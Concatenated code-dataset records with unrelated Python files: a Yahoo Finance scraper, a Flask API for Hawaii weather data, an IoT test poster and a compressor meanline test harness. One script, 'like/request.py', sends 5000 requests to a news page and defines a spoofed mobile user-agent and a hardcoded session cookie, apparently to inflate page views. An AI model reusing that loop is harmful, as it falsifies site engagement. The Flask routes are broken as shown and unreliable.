f\"balance-sheet?p={self.ticker}\"\n        stat_url = base_url + f\"key-statistics?p={self.ticker}\"\n        if htmls is None:\n            htmls = {\"fin\": None, \"bal\": None,\"stat\":None}\n        self.fin_soup = get_soup(fin_url, htmls[\"fin\"])\n        self.bal_sheet_soup = get_soup(bal_sheet_url,htmls[\"bal\"])\n        self.stat_soup = get_soup(stat_url,htmls[\"stat\"])\n    def get_market_cap(self):\n        list_res = self.stat_soup.select(\"td:has(> span:contains(\\\"Market Cap\\\")) + td\")\n        if len(list_res) != 1:\n            raise ValueError(\"had multiple returns for css selector\")\n        \n        return list_res[0].text\n    def get(self,key: str):\n        try:\n            return get_recent_val(key,self.fin_soup)\n        except:\n            try:\n                return get_recent_val(key,self.bal_sheet_soup)\n            except:\n                return None\n    def tuple_get(self, keys: list) -> tuple:\n        \"\"\"\n        Will return a tuple with the first value being the ticker string\n        followed by the values returned from self.get for each of\n        the keys in keys\n        \"\"\"\n        temp_list = [self.ticker]\n        for key in keys:\n            temp_list.append(self.get(key))\n        return tuple(temp_list)\n\nif __name__ == \"__main__\":\n    # parse a saved key-statistics page from disk; empty strings for the other\n    # pages keep the constructor from fetching anything over the network\n    file = open(\"../Analysis/downloads2/FMAO_stat.html\",\"r\")\n    ticker = YahooTicker(\"FMAO\", htmls={\"fin\": \"\", \"bal\": \"\", \"stat\": \"\".join(file.readlines())})\n    print(ticker.get_market_cap())\n    
file.close()\n","sub_path":"WebApp/yahoo_functions_revamp.py","file_name":"yahoo_functions_revamp.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"153177364","text":"import urllib.request\nfrom urllib.error import HTTPError,URLError\nimport socket\n\ntimeout = 2\nsocket.setdefaulttimeout(timeout)\n\n# 模仿浏览器\nopener = urllib.request.build_opener()\nopener.addheaders = [('User-agent', 'Dalvik/2.1.0 (Linux; U; Android 7.0; \\\n SM-G9300 Build/NRD90M)')]\n\nurl = 'http://h5.cqliving.com/info/detail/865240.html'\nheaders = {'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 7.0; \\\n SM-G9300 Build/NRD90M)', 'Cookie': 'PORSESSIONID= \\\n CD277E65F1185AB3A1A8B8EC82833285'}\n\nfor x in range(5000):\n try:\n urllib.request.urlopen(url)\n # opener.open(url)\n # print(x)\n # except HTTPError as e:\n # print(e.message)\n # continue\n # except URLError as e:\n # print(e)\n # continue\n except Exception as e:\n print(e, x)\n continue\n","sub_path":"like/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"317359262","text":"from flask import Flask, jsonify\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\", connect_args={'check_same_thread': False})\n\n\nBase = automap_base()\nBase.prepare(engine, reflect=True)\nBase.classes.keys()\n\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\nsession = Session(engine)\n\n#weather app\napp = Flask(__name__)\n\n\nlatest_date = (session.query(Measurement.date)\n .order_by(Measurement.date.desc())\n .first())\nlatest_date = list(np.ravel(latest_date))[0]\n\nlatest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')\nlatest_year = int(dt.datetime.strftime(latest_date, '%Y'))\nlatest_month = int(dt.datetime.strftime(latest_date, '%m'))\nlatest_day = int(dt.datetime.strftime(latest_date, '%d'))\n\nyear_before = dt.date(latest_year, latest_month, latest_day) - dt.timedelta(days=365)\nyear_before = dt.datetime.strftime(year_before, '%Y-%m-%d')\n\n\n\n\n@app.route(\"/\")\ndef home():\n return (f\"Welcome to Surf's Up!: Hawai'i Climate API
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/stations ~~~~~ a list of all weather observation stations
\"\n f\"/api/v1.0/precipitaton ~~ the latest year of preceipitation data
\"\n f\"/api/v1.0/temperature ~~ the latest year of temperature data
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\"\n f\"~~~ datesearch (yyyy-mm-dd)
\"\n f\"/api/v1.0/datesearch/2015-05-30 ~~~~~~~~~~~ low, high, and average temp for date given and each date after
\"\n f\"/api/v1.0/datesearch/2015-05-30/2016-01-30 ~~ low, high, and average temp for date given and each date up to and including end date
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\"\n f\"~ data available from 2010-01-01 to 2017-08-23 ~
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n results = session.query(Station.name).all()\n all_stations = list(np.ravel(results))\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/precipitaton\")\ndef precipitation():\n \n results = (session.query(Measurement.date, Measurement.prcp, Measurement.station)\n .filter(Measurement.date > yearBefore)\n .order_by(Measurement.date)\n .all())\n \n precipData = []\n for result in results:\n precipDict = {result.date: result.prcp, \"Station\": result.station}\n precipData.append(precipDict)\n\n return jsonify(precipData)\n\n@app.route(\"/api/v1.0/temperature\")\ndef temperature():\n\n results = (session.query(Measurement.date, Measurement.tobs, Measurement.station)\n .filter(Measurement.date > yearBefore)\n .order_by(Measurement.date)\n .all())\n\n tempData = []\n for result in results:\n tempDict = {result.date: result.tobs, \"Station\": result.station}\n tempData.append(tempDict)\n\n return jsonify(tempData)\n\n@app.route('/api/v1.0/datesearch/')\ndef start(startDate):\n sel = [Measurement.date, func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n results = (session.query(*sel)\n .filter(func.strftime(\"%Y-%m-%d\", Measurement.date) >= startDate)\n .group_by(Measurement.date)\n .all())\n\n dates = [] \n for result in results:\n date_dict = {}\n date_dict[\"Date\"] = result[0]\n date_dict[\"Low Temp\"] = result[1]\n date_dict[\"Avg Temp\"] = result[2]\n date_dict[\"High Temp\"] = result[3]\n dates.append(date_dict)\n return jsonify(dates)\n\n@app.route('/api/v1.0/datesearch//')\ndef startEnd(startDate, endDate):\n sel = [Measurement.date, func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n results = (session.query(*sel)\n .filter(func.strftime(\"%Y-%m-%d\", Measurement.date) >= startDate)\n .filter(func.strftime(\"%Y-%m-%d\", Measurement.date) <= endDate)\n .group_by(Measurement.date)\n .all())\n\n dates = [] \n for result in results:\n date_dict = {}\n date_dict[\"Date\"] = result[0]\n date_dict[\"Low Temp\"] = result[1]\n date_dict[\"Avg Temp\"] = result[2]\n date_dict[\"High Temp\"] = result[3]\n dates.append(date_dict)\n return jsonify(dates)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81921788","text":"import requests\nimport time\nimport random\n\n\nip='10.14.33.23'\n\nfor i in range(1,10):\n\tx=random.uniform(1,255)\n\tx=round(x,3)\n\tr = requests.get('http://'+ip+'/prueva/iot.php?valor='+str(x))\n\tr.status_code\n\ttime.sleep(10)\n","sub_path":"prueva/old/date_for_db.py","file_name":"date_for_db.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"222073287","text":"'''\nCreated on Feb 20, 2013\n\n@author: bachm03j\n'''\n\n\n# module attributes\n__version__ = \"0.1.0\"\n__author__ = \"Jonathan Bachmann\"\n__maintainer__ = \"Jonathan Bachmann\"\n__email__ = \"jonathan.bachmann@siemens.com\"\n__status__ = \"development\"\n\nimport math\n\nfrom compressorbvbase import CompressorBVBase as cbase\nfrom compressorblade import CompressorBlade\nfrom compressorbladehpa import CompressorBladeHpa\nfrom compressorvane import CompressorVane\nfrom compressorvanehpa import CompressorVaneHpa\nfrom compressorstation import 
CompressorStation\nfrom modelhpa import HpaModel\nfrom siethermopy import SieRealGas\n\n\ndef printStagePerfHdr():\n print ( '{0:<15s}{1:<15s}{2:<15s}{3:<15s}{4:<15s}{5:<15s}{6:<15s}{7:<15s}{8:<15s}{9:<15s}{10:<15s}{11:<15s}{12:<15s}{13:<15s}{14:<15s}{15:<15s}'.format('stage' \\\n ,'rtr_ptot' \\\n ,'rtr_ttot' \\\n ,'massflow' \\\n ,'temp_rise' \\\n ,'rtr_pi' \\\n ,'stg_pi' \\\n ,'rtr_etai' \\\n ,'stg_etai' \\\n ,'stg_psi' \\\n ,'rtr_phi_in' \\\n ,'str_phi_in' \\\n ,'stg_u_in' \\\n ,'rtr_alp_in' \\\n ,'str_alp_out' \\\n ,'stg_react' \\\n ) )\n\ndef printStagePerf(stgName, tplBldVan):\n cbld, cvan = tplBldVan\n delTstg = cvan.exit.tempTot - cbld.inlet.tempTot\n stgPi = cbld.getTotPR() * cvan.getTotPR()\n rtrEtaI = cbld.getEtaAdiab()\n stgEtaI = rtrEtaI\n stgPsi = cbld.getPsi()\n stgReact = cbld.getDeltaH() / (cvan.exit.h - cbld.inlet.h)\n print ( '{0:<15s}{1:<15f}{2:<15f}{3:<15f}{4:<15f}{5:<15f}{6:<15f}{7:<15f}{8:<15f}{9:<15f}{10:<15f}{11:<15f}{12:<15f}{13:<15f}{14:<15f}{15:<15f}'.format(stgName \\\n , cbld.inlet.pressTot \\\n , cbld.inlet.tempTot \\\n , cbld._massflowIn \\\n , delTstg \\\n , cbld.getTotPR() \\\n , stgPi \\\n , rtrEtaI \\\n , stgEtaI \\\n , stgPsi \\\n , cbld.getPhiIn() \\\n , cvan.getPhiIn() \\\n , cbld.inlet.wheelSpeed(cbld._rotSpeed) \\\n , cbld.inlet.getAlphaDeg() \\\n , cvan.exit.getAlphaDeg() \\\n , stgReact \\\n ) )\n\ndef printStageGasAnglesHdr():\n print ( '{0:<15s}{1:<15s}{2:<15s}{3:<15s}{4:<15s}{5:<15s}{6:<15s}{7:<15s}{8:<15s}{9:<15s}'.format('stage' \\\n ,'rtr_alp_in' \\\n ,'rtr_beta_in' \\\n ,'rtr_beta_out' \\\n ,'str_alp_in' \\\n ,'str_alp_out' \\\n ,'rtr_vaxi_in' \\\n ,'rtr_vtan_in' \\\n ,'sttr_vaxi_in' \\\n ,'sttr_vtan_in' \\\n ) )\n\ndef printStageGasAngles(stgName, tplBldVan):\n cbld, cvan = tplBldVan\n print ( '{0:<15s}{1:<15f}{2:<15f}{3:<15f}{4:<15f}{5:<15f}{6:<15f}{7:<15f}{8:<15f}{9:<15f}'.format(stgName \\\n , cbld.inlet.getAlphaDeg() \\\n , cbld.inlet.getBetaDeg() \\\n , cbld.exit.getBetaDeg() \\\n , cvan.inlet.getAlphaDeg() \\\n , cvan.exit.getAlphaDeg() \\\n , cbld.inlet.vaxi \\\n , cbld.inlet.vtan \\\n , cvan.inlet.vaxi \\\n , cvan.inlet.vtan \\\n ) )\n\n\ndef testMeanline():\n \n # radius ratio values taken directly from the Comp1d annulus inputs (true sail points)\n #radRatioPerStn = [ 1.9882,1.7735 \\\n # ,1.7369,1.5953 \\\n # ,1.5708,1.4574 \\\n # ,1.4398,1.3694 \\\n # ,1.3590,1.3166 \\\n # ,1.3086,1.2808 \\\n # ,1.2747,1.2570 \\\n # ,1.2506,1.2380 \\\n # ,1.2324,1.2212 \\\n # ,1.2168,1.2045 \\\n # ,1.1960,1.1884 \\\n # ,1.1846,1.1733 \\\n # ,1.1703,1.1647 \\\n # ,1.1612,1.1513 \\\n # ,1.1455,1.1403 \\\n # ,1.1371,1.1277 \\\n # ,1.1256,1.1209 \\\n # ,1.1168,1.1098 \\\n # ,1.1074,1.1039 \\\n # ,1.1018,1.0962 \\\n # ,1.0926,1.0896 \\\n # ,1.0882,1.0841 \\\n # ,1.0822,1.0800 \\\n # ,1.0788,1.0751 ]\n \n # rad ratio from taking sail points and making common x location between hub and case at each station\n # consistent with how Comp1D turns 2D rep into 1D (I think)\n radRatioPerStn = [ 1.9773375161,1.7809305647 \\\n ,1.7415957911,1.591923381 \\\n ,1.5664303357,1.4610611084 \\\n ,1.4403778196,1.3691304336 \\\n ,1.3583525406,1.317149218 \\\n ,1.3085937991,1.2808219223 \\\n ,1.2754327297,1.2562956228 \\\n ,1.2502675622,1.2382961183 \\\n ,1.2336211785,1.2200288442 \\\n ,1.2161050098,1.2053132548 \\\n ,1.1969761998,1.1873079686 \\\n ,1.1837131488,1.1741737284 \\\n ,1.1712278624,1.1635557942 \\\n ,1.1605871975,1.1519130378 \\\n ,1.1462350008,1.1394695309 \\\n ,1.1364192302,1.1283031134 \\\n ,1.1261007579,1.1203633402 \\\n ,1.1164138616,1.1103140369 \\\n 
,1.1078933834,1.1034460228 \\\n ,1.1014242921,1.0965593835 \\\n ,1.0928436548,1.0893547433 \\\n ,1.0879021809,1.0844413494 \\\n ,1.0824339671,1.0797746678 \\\n ,1.0786344258,1.0753023286 ]\n \n axiGapPerRow = [ 27.89,46.965 \\\n ,34.815,35.65 \\\n ,29.385,30.73 \\\n ,27.86,38.015 \\\n ,36.595,30.145 \\\n ,67.88,29.45 \\\n ,27.035,25.735 \\\n ,48.775,26.27 \\\n ,18.97,36.735 \\\n ,24.39,22.575 \\\n ,43.04,20.015 \\\n ,29.08,17.48 ]\n \n sqcPerRow = [ 0.717, 0.773 \\\n ,0.696, 0.744 \\\n ,0.664, 0.766 \\\n ,0.683, 0.732 \\\n ,0.730, 0.812 \\\n ,0.818, 0.778 \\\n ,0.791, 0.805 \\\n ,0.786, 0.795 \\\n ,0.802, 0.787 \\\n ,0.786, 0.813 \\\n ,0.785, 0.814 \\\n ,0.795, 0.780 \\\n ]\n \n afCntPerRow = [ 21, 38\n ,37, 48\n ,49, 54\n ,55, 64\n ,57, 70\n ,59, 74\n ,67, 82\n ,79, 86\n ,87, 100\n ,99, 106\n ,109, 114\n ,115, 118\n ]\n \n # axi chord in mm\n chrdAxiPerRow = [ 271.3,176.22 \\\n ,161.75,146.265 \\\n ,129.38,120.325 \\\n ,108.275,93.09 \\\n ,96.275,89.925 \\\n ,75.625,85.265 \\\n ,68.48,73.145 \\\n ,59.045,68.54 \\\n ,51.55,58.55 \\\n ,46.93,53.985 \\\n ,43.705,50.15 \\\n ,39.9,49.965 ]\n \n # chord in mm\n chordPerRow = [ 384.83, 200.72\n ,232.72, 170.12\n ,187.73, 147.63\n ,162.02, 129.23\n ,144.58, 105.14\n ,122.78, 102.23\n ,110.27, 87.91\n ,92.65, 83.59\n ,81.45, 71.77\n ,72.22, 64.93\n ,65.08, 59.81\n ,60.5, 59.95\n ]\n \n # thickness to chord\n tqcPerRow = [ 0.057, 0.070 \\\n ,0.063, 0.070 \\\n ,0.064, 0.069 \\\n ,0.061, 0.078 \\\n ,0.064, 0.073 \\\n ,0.064, 0.073 \\\n ,0.064, 0.073 \\\n ,0.065, 0.072 \\\n ,0.064, 0.072 \\\n ,0.065, 0.072 \\\n ,0.066, 0.072 \\\n ,0.064, 0.073 \\\n ]\n \n \n etaAdiabPerRow = [ 0.942, 1.00 \\\n ,0.944, 1.00 \\\n ,0.962, 1.00 \\\n ,0.961, 1.00 \\\n ,0.961, 1.00 \\\n ,0.963, 1.00 \\\n ,0.960, 1.00 \\\n ,0.961, 1.00 \\\n ,0.959, 1.00 \\\n ,0.959, 1.00 \\\n ,0.955, 1.00 \\\n ,0.954, 1.00 \\\n ]\n\n afTypePerRow = [ cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ]\n \n # phi s_in not used, station is copied from blade exit (modified from Comp1D output)\n # |\n # v\n # r_in r_out s_in s_out\n phiPerStn = [ 0.589, 0.523, 0.525, 0.516 \\\n ,0.552, 0.487, 0.494, 0.498 \\\n ,0.519, 0.452, 0.472, 0.452 \\\n ,0.463, 0.428, 0.443, 0.418 \\\n ,0.430, 0.413, 0.410, 0.403 \\\n ,0.424, 0.411, 0.408, 0.406 \\\n ,0.418, 0.407, 0.409, 0.407 \\\n ,0.425, 0.425, 0.425, 0.430 \\\n ,0.445, 0.445, 0.445, 0.458 \\\n ,0.465, 0.455, 0.455, 0.455 \\\n ,0.461, 0.455, 0.455, 0.458 \\\n ,0.469, 0.455, 0.455, 0.461 ]\n \n \n\n# # values taken from Comp1D output file, others values need to be modified to get good comparisons\n# # phi s_in not used, station is copied from blade exit (modified from Comp1D output), keep the value from Comp1d\n# # |\n# # v\n# phiPerStnDum =[ 0.589, 0.523, 0.534, 0.516 \\\n# ,0.552, 0.487, 0.507, 0.511 \\\n# ,0.528, 0.472, 0.486, 0.444 \\\n# ,0.493, 0.443, 0.461, 0.411 \\\n# ,0.455, 0.410, 0.443, 0.403 \\\n# ,0.454, 0.408, 0.453, 0.403 \\\n# ,0.458, 0.409, 0.458, 0.407 \\\n# ,0.465, 0.425, 
0.470, 0.430 \\\n# ,0.485, 0.445, 0.498, 0.458 \\\n# ,0.505, 0.455, 0.510, 0.455 \\\n# ,0.505, 0.455, 0.499, 0.458 \\\n# ,0.511, 0.455, 0.509, 0.461 ]\n \n \n # work coefficient per stage (directly from Comp1D output) DO NOT MODIFY\n psiPerStg = [ 0.358335\n ,0.385189\n ,0.380417\n ,0.360535\n ,0.328285\n ,0.294571\n ,0.288461\n ,0.302315\n ,0.299666\n ,0.322095\n ,0.312355\n ,0.314445\n ]\n \n reactPerStg = [0.651, 0.706, 0.668, 0.623, 0.595, 0.505, 0.501, 0.502, 0.507, 0.499, 0.519, 0.514]\n # JGB - 04/16/2013 : prev test reqrd modification to reaction values, but later found error in vane exit vel resultant calc.\n # after fixing the below reaction values cause non-physical vane exit conditions\n #reactPerStg = [0.544, 0.585, 0.584, 0.557, 0.551, 0.5, 0.491, 0.485, 0.480, 0.475, 0.470, 0.465]\n \n massflowPerStg = [685.183,685.183,685.183,685.183,685.183,679.91,679.91,655.58,655.58,643.25,607.62,607.62]\n \n # calculate number of stages from psi\n numStgs = 7 #len(psiPerStg)\n \n # set ambient conditions and compressor operating parameters\n tamb = 15.0 + 273.15 # K\n pamb = 1.0034 # bar\n relHum = 60.0 # % humidity\n speed = 60.0 # hz\n \n alpR1In = 18.68 # deg\n \n # initialize the gas model\n gasMdl = SieRealGas(pamb, tamb, relHum)\n \n # set starting gas conditions from pamb and tamb\n rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic, Visc, PrEq, PrFroz, Keq, Kfroz = gasMdl.ceaTp(tamb, pamb)\n # print( rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic )\n\n pTotAmb = pamb\n tTotAmb = tCalc\n hTotAmb = hCalc\n sAmb = sCalc\n \n cbs = dict()\n cvs = dict()\n \n # print header for reporting station results\n CompressorStation.printStateHdr()\n \n # loop through each stage and run the calculations\n xTe_PrevRow = 0.0\n for iStg in range(numStgs):\n \n iBle = iStg * 4\n iBte = iBle + 1\n iVle = iBle + 2\n iVte = iBle + 3\n \n iB = iStg * 2\n iV = iB + 1\n \n cbNamePrev = 'cb{0:d}'.format(iStg)\n cvNamePrev = 'cv{0:d}'.format(iStg)\n \n cbName = 'cb{0:d}'.format(iStg+1)\n cvName = 'cv{0:d}'.format(iStg+1)\n \n \n # Initialize blade instance\n xLe_mm = xTe_PrevRow + axiGapPerRow[iB]\n afCnt = afCntPerRow[iB]\n tqc = tqcPerRow[iB]\n chord_mm = chordPerRow[iB]\n if (afTypePerRow[iB] == cbase.AirfoilType.HPA):\n newCb = CompressorBladeHpa(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, False, False, 0.0, cbName)\n else:\n chrdAxi_mm = chrdAxiPerRow[iB]\n stgrAng = math.degrees( math.acos(chrdAxi_mm/chord_mm) )\n newCb = CompressorBlade(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, stgrAng, cbName)\n \n # Get blade inlet conditions for this stage\n if (iStg == 0):\n # first stage use, ambient conditions (total pressure and temp) known and entrance alpha flow angle into the blade\n alpha_in = alpR1In\n hTot = hTotAmb\n s = sAmb\n else:\n # all other stages, use upstream stage vane exit values\n alpha_in = cvs[cvNamePrev].exit.getAlphaDeg()\n hTot = cvs[cvNamePrev].exit.hTotAbs()\n s = cvs[cvNamePrev].exit.s\n \n # calculate blade inlet station\n newCb.setInletFromPhi(phiPerStn[iBle], radRatioPerStn[iBle], alpha_in, hTot, s)\n newCb.inlet.printState()\n \n # calculate blade exit station\n if (afTypePerRow[iB] == cbase.AirfoilType.HPA):\n newCb.setExitFromPhiPsi(phiPerStn[iBte], radRatioPerStn[iBte], psiPerStg[iStg])\n else:\n newCb.setExitFromPhiPsiEta(phiPerStn[iBte], radRatioPerStn[iBte], psiPerStg[iStg], etaAdiabPerRow[iB])\n newCb.exit.printState()\n \n \n \n # Initialize vane instance\n xLe_mm 
= newCb.getXte()*1000.0 + axiGapPerRow[iV]\n afCnt = afCntPerRow[iV]\n tqc = tqcPerRow[iV]\n chord_mm = chordPerRow[iV]\n if (afTypePerRow[iV] == cbase.AirfoilType.HPA):\n newCv = CompressorVaneHpa(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, False, False, 0.0, cvName)\n else:\n chrdAxi_mm = chrdAxiPerRow[iV]\n stgrAng = math.degrees( math.acos(chrdAxi_mm/chord_mm) )\n newCv = CompressorVane(gasMdl, massflowPerStg[iStg], speed, xLe_mm\n , tqc, afCnt, chord_mm, stgrAng, cvName)\n \n # Set parameters needed to calculate the vane inlet and exit conditions\n hStageIn = newCb.inlet.h\n delHblade = newCb.getDeltaH()\n lossCoeff = 0.00\n axiGapVane = axiGapPerRow[iV]\n react = reactPerStg[iStg]\n \n # calculate vane inlet station (set equal to blade exit station\n newCv.setInletFromUpstreamStation(axiGapVane, newCb.exit)\n newCv.inlet.printState()\n \n # calculate vane exit station\n if (afTypePerRow[iV] == cbase.AirfoilType.HPA):\n newCv.setExitFromPhiReact(phiPerStn[iVte], radRatioPerStn[iVte], react, hStageIn, delHblade)\n else:\n newCv.setExitFromPhiReactLossCoef(phiPerStn[iVte], radRatioPerStn[iVte], lossCoeff, react, hStageIn, delHblade)\n newCv.exit.printState()\n \n \n \n # store trailing edge x location of previous vane row\n xTe_PrevRow = newCv.getXte() * 1000.00\n \n cbs[cbName] = newCb\n cvs[cvName] = newCv\n \n #newCb.inlet.printState()\n #newCb2.inlet.printState()\n #newCb.exit.printState()\n #newCb2.exit.printState()\n \n #newCv.inlet.printState()\n #newCv.exit.printState()\n \n \n print(\"\\n\\n\")\n printStagePerfHdr()\n for iStg in range(numStgs):\n \n stgName = 'stg_{0:d}'.format(iStg+1)\n cbName = 'cb{0:d}'.format(iStg+1)\n cvName = 'cv{0:d}'.format(iStg+1)\n \n cb = cbs[cbName]\n cv = cvs[cvName]\n \n tplStg = (cb,cv)\n printStagePerf(stgName, tplStg)\n \n \n print(\"\\n\\n\")\n printStageGasAnglesHdr()\n for iStg in range(numStgs):\n \n stgName = 'stg_{0:d}'.format(iStg+1)\n cbName = 'cb{0:d}'.format(iStg+1)\n cvName = 'cv{0:d}'.format(iStg+1)\n \n cb = cbs[cbName]\n cv = cvs[cvName]\n \n tplStg = (cb,cv)\n printStageGasAngles(stgName, tplStg)\n \n ## DEBUG IMPLEMENTATIONS\n ## UNCOMMENT TO SEE TREND OF MASSFLOW VS RADIUS RELATIONSHIP\n #rads = list()\n #errs = list()\n #for i in range(1, 31):\n # rInnr = float(i/10.0)\n # args = (r1Inlet, phi, radRatio, math.radians(alpha_in))\n # err = CompressorStation.errMassFromPhiHtotPtot(rInnr, *args)\n \n #plt.plot(rads, errs, color = 'blue', linestyle = '--')\n #plt.show()\n\n\ndef testHpaModel():\n\n useBetaMidMdl = False\n \n useCaseyMod = False\n rzdCasey = 5.0\n \n # values taken from R05 50% span radial output of 68HK20_CFP01.inp\n betaIn = 52.47 # deg\n delBeta = 17.69 # deg\n machIn = 0.784\n avdr = 1.080\n tqc = 0.068\n cqs = 1.288\n chord = 0.13928 # m\n \n hpaMdl = HpaModel(useBetaMidMdl, useCaseyMod, rzdCasey)\n hpaMdl.setReferenceData(betaIn, delBeta, machIn, avdr, tqc, cqs, chord)\n \n vmo_vmi = 195.2/204.9\n reyIn = 0.5822e07\n\n hpaMdl.calcHpaState(betaIn, machIn, avdr, vmo_vmi, reyIn)\n\n\ndef fg5(cp1, cp2, rgas):\n # cp_avg / Rgas\n f = 1.0/rgas/2.0*(cp2+cp1)\n return f\n\ndef fg6a(fg5):\n # this is kappa(gamma)!!\n f = fg5/(fg5-1.0)\n return f\n\ndef fg1(fg6a):\n #FG1 = (FG6-1.0)/2.0\n # kappa - 1 / 2\n f = (fg6a-1.0)/2.0\n return f\n\ndef fg2(fg6a):\n #FG2 = (FG6+1.0)/2.0/(FG6-1.0)\n f = (fg6a+1.0)/2.0/(fg6a - 1.0)\n return f\n\ndef fg3(fg6a):\n # FG3 = 1.0/(FG6-1.0)\n f = 1.0/(fg6a-1.0)\n return f \n \ndef fg4(fg2):\n #FG4 = 0.5/FG2\n f = 0.5/fg2\n return f\n\ndef fg6b(fg6a):\n # this is 
2.0/(kappa+1.0), not kappa itself\n    f = 2.0/(fg6a+1.0)\n    return f\n\n\ndef F2(A, cp1, cp2, rgas):\n    # F2 - calculates the pressure coefficient from critical mach number\n    # A : critical mach number\n    _FG5 = fg5(cp1, cp2, rgas)\n    _FG6a = fg6a(_FG5)\n    _FG2 = fg2(_FG6a)\n    _FG4 = fg4(_FG2)\n    _FG6 = fg6b(_FG6a)\n    _FG1 = fg1(_FG6a)\n    \n    ma2 = math.pow(A,2.0)\n    # F2(A) = (1.0 - (FG6 + FG4*A**2)**FG5) / ((1.0 + FG1*A**2)**FG5 - 1.0)\n    f = (1.0 - math.pow( (_FG6 + _FG4 * ma2 ) , _FG5)) / (math.pow( (1.0+ _FG1*ma2 ) , _FG5) - 1.0)\n    return f\n\n\ndef cpcrit(ma_inf, gamma):\n    # pressure coefficient where the mach number somewhere along the airfoil is 1 as a function of the approach mach number\n    gp1 = gamma + 1.0\n    gm1ma2 = (gamma-1.0)*math.pow(ma_inf, 2.0)\n    gqgm1 = gamma/(gamma-1.0)\n    \n    a = 2.0/(gamma*math.pow(ma_inf,2.0))\n    b = (2.0 + gm1ma2)/(gp1)\n    c = math.pow(b, gqgm1 )\n    \n    #f = 2.0/(gamma*math.pow(ma_crit,2.0)) * ( math.pow((2.0 + (gamma-1.0)*math.pow(ma_crit, 2.0)/(gamma+1.0)), (gamma/(gamma-1.0))) - 1.0 )\n    f = a * ( c - 1.0 )\n    return f\n\n\ndef testGasDynStuff():\n    \n    # set ambient conditions and compressor operating parameters\n    tamb = 15.0 + 273.15  # K\n    pamb = 1.0034  # bar\n    relHum = 60.0  # % humidity\n    \n    # initialize the gas model\n    gasMdl = SieRealGas(pamb, tamb, relHum)\n    \n    # set starting gas conditions from pamb and tamb\n    rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic, Visc, PrEq, PrFroz, Keq, Kfroz = gasMdl.ceaTp(tamb, pamb)\n    # print( rho, press, tCalc, hCalc, uCalc, sCalc, MWCalc, gamma, CpEq, CpFroz, Vsonic )\n    \n    # examine the FG functions to understand the equations behind them\n    _FG5 = fg5(CpEq, CpEq, gasMdl.Rgas)\n    _FG5test = gamma/(gamma-1.0)\n    \n    _FG6a = fg6a(_FG5)\n    _FG6atest = gamma\n    \n    _FG2 = fg2(_FG6a)\n    _FG2test = (gamma+1.0)/(2*(gamma-1.0))\n    \n    _FG4 = fg4(_FG2)\n    _FG4test = (gamma - 1.0)/(gamma + 1.0)\n    \n    _FG6b = fg6b(_FG6a)\n    _FG6btest = 2.0 / (gamma + 1.0)\n    \n    _FG1 = fg1(_FG6a)\n    _FG1test = (gamma - 1.0)/2.0\n    \n#     cp_cr1 = F2(0.8, gamma)\n#     cp_cr2 = cpcrit(0.8, gamma)\n\n\n#--- MAIN ---\nif __name__ == '__main__':\n    testMeanline()\n    #testHpaModel()\n    #testGasDynStuff()","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":26547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
